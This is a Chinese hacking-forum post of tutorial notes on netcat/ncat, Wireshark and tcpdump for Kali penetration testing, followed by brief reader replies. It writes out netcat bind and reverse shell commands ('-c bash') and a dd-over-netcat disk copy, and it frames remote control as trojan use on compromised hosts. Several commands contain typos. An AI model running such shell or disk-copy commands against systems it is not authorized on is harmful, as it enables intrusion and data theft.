设为首页收藏本站
查看: 878|回复: 6

Kali Linux安全渗透-从入门到精通

[复制链接]
  • TA的每日心情

    2020-5-26 10:59
  • 签到天数: 43 天

    [LV.5]常住居民I

    发表于 2020-5-25 09:27:32 | 显示全部楼层 |阅读模式
    常用工具:
    经常使用且功能强大
    安全从业者必不可少的帮手
    Nc/ncat
    Wireshark
    Tcpdump
    NETCAT-NC(瑞士军刀)

    基本介绍
    网络工具中的瑞士军刀-小身材,大智慧
    侦听模式/传输模式
    telnet/获取banner模式
    传输文本信息
    传输文件/目录
    加密传输文件
    远程控制/木马
    加密所用流量
    流媒体服务器
    远程克隆硬盘
    一波操作
    NC-TELNET/BANNER
    nc-nv 1.1.1.1 110 (pop3 服务器)
    nc-nv 1.1.1.1 25 (smtp 邮件服务器)
    nc-nv 1.1.1.1 80 (网站)
    nc -h 查看nc可用参数
    NC-传输文本信息
    A:nc -l -p 4444(打开4444端口) 使用netstat -pantu | grep 4444 查看端口是否打开
    B:nc -nv 1.1.1.1 4444
    nc -q 传输后直接断连接
    远程电子取证信息收集
    NC-传输文件/目录
    传输文件
    A:nc -lp 333>test.mp4
    B:nc -nv 1.1.1.1 333 < test.mp4 -q 1
    or
    A: nc-q l -lp 333<a.mp4
    B: nc-nv 1.1.1.1 333>2.mp4
    传输目录
    A:tar -cvf -music/ | nc-lp 333 -q 1
    B:nc -nv 1.1.1.1 333 | tar -xvf -
    加密传文件
    A:nc -lp 333 | mcrypt -flush -Fbqd -a rijndael-256 -m ecb > 1.mp4
    B:mcrypt --flush -Fbq -a rjindael-256-m ecb <a.mp4 | nc -nv 1.1.1.1 333 -q 1(对称加密算法)
    NC-流媒体服务
    A:cat 1.mp4 | nc -lp 333
    B:nc -nv 1.1.1.1 333 | mplayer -vo x11 -cache 3000 -
    NC-端口扫描
    nc -nvz 1.1.1.1-65535 (探测tcp端口)
    nc -nvzu 1.1.1.1-1024 (探测udp端口)
    NC-远程克隆硬盘
    A(接收端):nc -lp 333 | dd of=/dev/sda
    B(被取证电脑):dd if=/dev/sda | nc -nv 1.1.1.1 333 -q 1
    远程电子取证,可以将目标服务器远程复制,或者内存
    NC-远程控制
    正向:
    A(服务器):nc -lp 333 -c bash
    B(客户端):nc 1.1.1.1 333
    反向:
    A:nc -lp 333
    B:nc 1.1.1.1 333 -c bash
    注:windows用户把bash改成cmd
    适用于内网访问外网
    NC-NCAT
    NC缺乏加密和身份验证(肉鸡可能被窃取)的能力

    Ncat包含于nmap工具包中(可实现加密,身份验证,每次会重新生成指纹信息)

    A:ncat -c bash --allow 192.168.20.14 -vnl 333 --ssl

    B:ncat -nv 1.1.1.1 333 --ssl

    不同系统/平台的nc参数功能不尽相同

    WIRESHARK(后续补充)-被动扫描大法

    基本介绍
    抓包嗅探协议分析
    安全专家必备的技能
    抓包引擎
    Libcap9----Linux
    Winpcap10—Windows
    解码能力(评价之根本)
    基本使用方法
    启动
    选择抓包网卡
    混杂模式
    实时抓包
    保存和分析捕获文件
    首选项
    WIRESHARK-筛选器
    过滤掉干扰的数据包
    抓包筛选器
    显示筛选器
    WIRESHARK-常见协议包
    数据的分层结构
    ARP
    ICMP
    TCP(三次握手)
    UDP
    DNS
    HTTP(明文协议)
    FTP
    WIRESHARK-TCP
    数据流
    HTTP
    SMTP
    POP3
    SSL
    WIRESHARK-信息统计
    节点数
    协议分布
    包大小分布
    会话连接
    解码方式
    专家系统
    WIRESHARK-实践
    抓包对比nc,ncat加密与不加密的流量
    企业抓包部署方案(采用商业化软件)
    Sniffer
    Cace/riverebed (底层基于wireshark)
    Cascad pilot(大流量抓包++)
    镜像端口(Cisco)
    TCPDUMP

    基本介绍
    No-GUI的抓包分析工具
    Linux,Unix系统默认安装
    TCPDUMP-抓包
    抓包
    默认只抓68个字节
    tcpdump -i eth0 -s 0 -2 file.pcap
    tcpdump -i eth0 port 22
    读取抓包文件
    tcpdump -r file.pcap
    TCPDUMP-筛选
    tcpdump -n http.cap | awk ‘{print $3}’ | sort -u
    tcpdump -n src host [ip address] -r http.cap
    tcpdump -n dst host [ip address] -r http.cap
    tcpdump -n port 53 -r http.cap
    tcpdump -nX port 80 -r http.cap
    TCP 高级筛选
    tcpdump -A -n ‘tcp[13]=24’ -r http.cap
    过程文档记录
    Dradis(Kali 自带)
    短期临时小团队资源共享
    各种插件导入问价
    Keepnote
    Truecrypt(注重信息保密)
  • TA的每日心情
    慵懒
    2020-5-31 08:29
  • 签到天数: 20 天

    [LV.4]偶尔看看III

    发表于 2020-5-25 09:47:55 | 显示全部楼层
    谢谢楼主分享
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    慵懒
    3 天前
  • 签到天数: 74 天

    [LV.6]常住居民II

    发表于 2020-5-26 14:48:55 | 显示全部楼层 赞助商
    这是本书吧,求分享
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2020-7-3 09:28
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2020-6-12 10:06:02 来自手机 | 显示全部楼层
    谢谢楼主分享
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    慵懒
    2020-6-27 20:29
  • 签到天数: 76 天

    [LV.6]常住居民II

    发表于 2020-6-15 20:13:00 | 显示全部楼层
    这是本书吧,求分享.
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    关闭

    站长推荐 上一条 /3 下一条

    红盟社区--中国红客联盟 

    Processed in 0.058790 second(s), 19 queries.

    站点统计| 举报| Archiver| 手机版| 黑屋 |   

    Powered by HUC © 2001-2017 Comsenz Inc.

    手机扫我进入移动触屏客户端

    关注我们可获取更多热点资讯

    Honor accompaniments. theme macfee

    快速回复 返回顶部 返回列表